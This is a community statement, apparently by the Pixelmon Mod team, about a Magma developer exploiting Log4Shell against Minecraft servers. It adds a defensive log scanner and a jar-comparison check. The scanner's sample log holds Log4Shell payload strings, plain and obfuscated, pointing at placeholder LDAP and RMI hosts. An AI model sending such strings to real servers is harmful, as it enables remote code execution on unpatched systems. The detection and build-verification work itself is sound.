To read this post in document form, see the copies on Pixelmon Storage or Google Drive.
The Pixelmon Mod will no longer support, recommend or work with the Magma Team, developers of a Spigot-Forge hybrid server API, because they have compromised the security of modded communities online. This post first sets out what happened; we also hope it explains why Magma’s breach of trust goes beyond Pixelmon.
On the morning of December 10th, 2021, Magma’s developer TheDevMinerTV exploited the Log4j remote code execution (RCE) vulnerability known as Log4Shell (CVE-2021-44228) against public Minecraft servers. Log4Shell lets an attacker run code on an unpatched server by placing a JNDI lookup string in any text the server logs, such as a chat message; Mojang’s blog post on the issue explains how it affects Minecraft. We confirmed that TheDevMinerTV was actively teaching and exploiting the vulnerability against public servers while their project lead, Hexeption, watched. We have confirmed that 26 servers, and a number of clients ranging from vanilla to modded, were targeted with several payloads, including code that shut servers down. The session was streamed in Magma’s own public voice channels, where its effects on servers and clients alike could be seen.
Upon discovering the source of the attacks, affected public servers and our own staff contacted moderators of the Magma project for help in protecting their servers against the Log4Shell vulnerability. Chat logs confirm that they raised the alarm in Magma’s own Discord. Despite the severity of their developer’s actions, no Magma member intervened to stop the attacks, which let TheDevMinerTV continue under the eyes of the project’s senior members.
After our community reported the attacks, Magma silently removed TheDevMinerTV’s developer rank on their Discord. Their Discord admin, Kwright02, deleted all of our members’ messages reporting the events, clearing the Discord of any evidence that this had happened. As a result, TheDevMinerTV’s account remains active on their Discord, providing support to unsuspecting members of the modded community.
At our request, a meeting was arranged to discuss the events of December 10th. Hexeption did not attend, leaving my Community Manager waiting almost two hours with no explanation, and instead sent junior members of their team who had no knowledge of the situation. The Magma moderators who did attend committed to gathering information on their developer’s actions, and several days later we were provided with a repository of the code TheDevMinerTV had executed.
Thanks to log contributions from the community, we were able to determine that the information Magma delivered was false: the code we were given did not match the logs of the victim servers, making it impossible to ascertain the scope of the Log4Shell damage from it. Affected servers also allowed us to confirm that TheDevMinerTV used both their own Minecraft account and alternate accounts to attack servers repeatedly. Further timeline analysis showed that TheDevMinerTV’s teachings inspired others to attack more servers, further increasing the damage caused by Magma’s negligence.
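The log review described above, checking victim servers’ logs against what was claimed to have been run, is something any server operator can do with their own logs. The following is an added example written for this post, not Pixelmon’s, Magma’s or Mojang’s code: it scans Minecraft server log lines for Log4Shell lookup strings, including the nested-lookup obfuscation used to hide the word jndi from simple searches, and reports which player and which attacker endpoint each one points at. The log lines, player names and hostnames in it are constructed placeholders, not data from the incident.

```python
"""Find Log4Shell (CVE-2021-44228) lookup strings in Minecraft server logs.

Added example for this post; it is not code from Pixelmon, Magma or Mojang.
The log lines below are constructed to mimic the vanilla server log format,
and every hostname or address in them is a placeholder, not observed
attacker infrastructure.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Vanilla server log line: "[HH:MM:SS] [thread/LEVEL]: message", where chat
# messages carry a "<player> " prefix. Command and join lines have no such
# prefix but are logged too, so they must be scanned as well.
LINE_RE = re.compile(r"^\[(\d\d:\d\d:\d\d)\] \[[^\]]+\]: (?:<([^>]+)> )?(.*)$")

# Nested lookups used to hide the literal word "jndi": ${lower:x} / ${upper:x}
# resolve to x in that case, and ${anything:-default} (e.g. ${::-j}) resolves
# to its default value. Neither alternative may span an inner "${".
NESTED_RE = re.compile(r"\$\{(lower|upper):([^${}]*)\}|\$\{[^${}]*:-([^${}]*)\}", re.IGNORECASE)

# Once unwrapped, the payload is ${jndi:<scheme>:<target>...}; capture the
# scheme (ldap, ldaps, rmi, dns, iiop, ...) and the host[:port] it points at.
JNDI_RE = re.compile(r"\$\{jndi:([a-z]+):/*([^/${}\s]+)", re.IGNORECASE)


@dataclass(frozen=True)
class Hit:
    line_no: int
    timestamp: str
    player: Optional[str]   # None when the line is not a chat message
    scheme: str
    target: str
    raw: str


def deobfuscate(text: str, max_rounds: int = 20) -> str:
    """Resolve nested lower/upper/default lookups until the text stops changing."""
    def resolve(m):
        if m.group(1) is not None:
            inner = m.group(2)
            return inner.lower() if m.group(1).lower() == "lower" else inner.upper()
        return m.group(3)

    for _ in range(max_rounds):
        text, n = NESTED_RE.subn(resolve, text)
        if n == 0:
            break
    return text


def scan(log_text: str) -> List[Hit]:
    """Return one Hit per JNDI lookup found in the log, after deobfuscation."""
    hits: List[Hit] = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        m = LINE_RE.match(line)
        if not m:
            continue
        timestamp, player, message = m.groups()
        for j in JNDI_RE.finditer(deobfuscate(message)):
            hits.append(Hit(line_no, timestamp, player, j.group(1).lower(), j.group(2), line))
    return hits


def targets(hits: List[Hit]) -> Dict[str, int]:
    """Count hits per attacker endpoint; this is what you share with other servers."""
    counts: Dict[str, int] = {}
    for h in hits:
        counts[h.target] = counts.get(h.target, 0) + 1
    return counts


# Constructed sample log, not a real server's log.
SAMPLE_LOG = """\
[09:12:01] [Server thread/INFO]: <Alice> anyone up for a raid tonight?
[09:12:44] [Server thread/INFO]: <Mallory> ${jndi:ldap://attacker.invalid:1389/a}
[09:13:02] [Server thread/INFO]: <Mallory> ${${lower:j}ndi:${lower:l}dap://attacker.invalid:1389/b}
[09:13:30] [Server thread/INFO]: <Mallory> ${${::-j}${::-n}${::-d}${::-i}:rmi://10.0.0.5:1099/c}
[09:14:10] [Server thread/INFO]: Mallory issued server command: /me ${jndi:dns://10.0.0.5/probe}
[09:14:40] [Server thread/INFO]: <Bob> gg everyone
[09:15:00] [Server thread/INFO]: Stopping the server
"""

if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for h in found:
        who = h.player or "(not a chat line)"
        print(f"line {h.line_no} {h.timestamp} {who}: {h.scheme} -> {h.target}")
    print("endpoints:", targets(found))
```

Run it over latest.log and the archived logs/*.log.gz (decompressed) from the incident window. Two caveats: the lookup fires on anything the server logs, not just chat, so scan whole files rather than only the lines with a player prefix; and a hit shows that the server logged the string, not that the callback succeeded, so whether the server was running the mitigations from Mojang’s post (the -Dlog4j2.formatMsgNoLookups=true JVM flag on 1.17 and later, and the Log4j configuration file they provided for older versions) decides whether a logged string could have become code execution.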
Having disproved the evidence Magma provided, we contacted Hexeption one last time, on December 13th, 2021, to discuss the way forward. Having been in contact with the affected servers within our community, it was in our interest to understand Magma’s response to the events.
After failing to stop the Log4Shell attacks, deleting chat logs, providing false evidence and remaining silent and inactive in the face of a grave action by their team, Magma’s lead, Hexeption, clarified that they “don’t have control over the actions of [their] staff team”. In fact, TheDevMinerTV’s actions were “done in [their] free time”, and therefore our issue would be “an issue with DevMiner”. For all intents and purposes, Magma feels that they should not be held responsible for TheDevMinerTV’s actions.
The Pixelmon Mod feels differently. We have learned that modded projects such as ours become an integral part of the Minecraft community. We recognize that the actions of our teams reflect on the modded community at large: our successes instill trust in players and pave the way for years of shared growth, and our failures matter just as much. Magma’s failure to address the actions of their developer, witnessed by their project leader and admins, affects far more than those 26 targeted servers. After meeting our partners and contacts to inform them of the situation, we felt this post was needed to clarify and inform others beyond our reach.
Magma’s negligence breaches the trust users place in modded projects like ours and many more. We will not accept their careless inaction in the face of dangerous RCE exploits within Minecraft. The security of our community is non-negotiable, and we will hold them responsible even when they won’t. In light of this, we will not be recommending Magma as a server API, and we urge our readers to do the same.
This all said, I would like to note that Magma’s code is not the issue here. It is open source and readable, and anyone with experience can tell you it is safe. Like most of the modding community’s codebases, it can be considered trustworthy thanks to the review the community as a whole performs; software accountability is part of that. Open source lets anyone check that the code is safe, but it does not by itself prove that the binaries you download were built from that code: that comes down to the people compiling it. If you cannot review the code yourself, you have to trust the maintainers that the binaries built for release match the open source repository exactly. Quoted from Lex, the project manager for Minecraft Forge, “You have to have a level of trust in the developers to not do something malicious in the depths of the code, or out of view in the build service.” This is an issue with the human factor: it took one person taking malicious steps, and missteps from those around them, to do what in the opinion of my staff and I has irreparably damaged Magma’s reputation.
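One concrete way to act on the point above, that a release binary should be exactly what the published source builds to, is to rebuild the tagged source yourself and diff the two jars entry by entry. The following is an added example written for this post, not Pixelmon’s, Magma’s or Forge’s code; it constructs two small jars in memory with placeholder contents so it runs offline, and in real use you would pass the downloaded release jar and your own build to compare_jars().

```python
"""Check that a release jar matches a jar you built yourself from the tagged
source, entry by entry, ignoring zip metadata that legitimately differs
between builds (timestamps, entry order, compression settings).

Added example for this post; it is not Pixelmon, Magma or Forge code. The two
jars are built in memory with placeholder class bytes so the script runs
offline; for real files, pass their paths to compare_jars().
"""
import hashlib
import io
import zipfile
from typing import Dict, List, Union

JarSource = Union[str, bytes]

# Signature files only exist in a signed release and can never match a local
# rebuild, so they are excluded from the comparison rather than reported.
SIGNATURE_SUFFIXES = (".SF", ".RSA", ".DSA", ".EC")


def entry_digests(jar: JarSource) -> Dict[str, str]:
    """Map each file entry to the SHA-256 of its decompressed content."""
    source = io.BytesIO(jar) if isinstance(jar, bytes) else jar
    digests: Dict[str, str] = {}
    with zipfile.ZipFile(source) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            if info.filename.startswith("META-INF/") and info.filename.endswith(SIGNATURE_SUFFIXES):
                continue
            digests[info.filename] = hashlib.sha256(zf.read(info)).hexdigest()
    return digests


def compare_jars(release: JarSource, rebuilt: JarSource) -> Dict[str, List[str]]:
    """Report entries present in only one jar and entries whose content differs."""
    a, b = entry_digests(release), entry_digests(rebuilt)
    return {
        "only_in_release": sorted(set(a) - set(b)),
        "only_in_rebuilt": sorted(set(b) - set(a)),
        "modified": sorted(name for name in set(a) & set(b) if a[name] != b[name]),
    }


def _make_jar(entries: Dict[str, bytes], stamp, compression) -> bytes:
    """Build a jar in memory with a fixed timestamp (fixture helper only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            info = zipfile.ZipInfo(name, date_time=stamp)
            info.compress_type = compression
            zf.writestr(info, data)
    return buf.getvalue()


# Constructed fixtures: placeholder class files (0xCAFEBABE magic plus filler),
# not bytecode from any real mod.
_COMMON = {
    "META-INF/MANIFEST.MF": b"Manifest-Version: 1.0\n",
    "com/example/mod/Main.class": b"\xca\xfe\xba\xbe" + b"\x00" * 28,
    "com/example/mod/Util.class": b"\xca\xfe\xba\xbe" + b"\x01" * 28,
}
# "Release": one class differs, one extra class is present, the timestamp and
# compression differ, and there is a signature file a local build would lack.
RELEASE_JAR = _make_jar(
    {**_COMMON,
     "com/example/mod/Util.class": b"\xca\xfe\xba\xbe" + b"\x02" * 28,
     "com/example/mod/Hidden.class": b"\xca\xfe\xba\xbe" + b"\x03" * 28,
     "META-INF/RELEASE.RSA": b"placeholder signature"},
    stamp=(2021, 12, 10, 9, 12, 0), compression=zipfile.ZIP_DEFLATED)
REBUILT_JAR = _make_jar(_COMMON, stamp=(2021, 12, 14, 18, 0, 0), compression=zipfile.ZIP_STORED)

if __name__ == "__main__":
    for key, names in compare_jars(RELEASE_JAR, REBUILT_JAR).items():
        print(f"{key}: {names or '-'}")
```

Java builds are often not byte-for-byte reproducible, so a difference in META-INF/MANIFEST.MF or in resources that embed a build date is common and has to be judged rather than treated as proof of tampering. A .class entry that differs, or exists only in the release, with nothing in the repository to account for it, is the case worth decompiling, because it is exactly the change “out of view in the build service” that Lex describes. Note that a publisher’s checksum only proves the download was not altered after upload; it says nothing about whether the upload came from the repository.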
With that, I would remind software developers in this community to be careful about who represents your project and who you give access to your code and release pipeline. Do due diligence when recruiting, and make sure you have a system of accountability in place.
I would like to thank my own community, the staff team of Aternos, members of Minecraft Forge, the staff of MMD, our partner Nodecraft, Ryan at ATLauncher and Jared from CraftTweaker for their support, and for meeting with us to discuss this issue, make it clear to others and decide how we would address it going forward.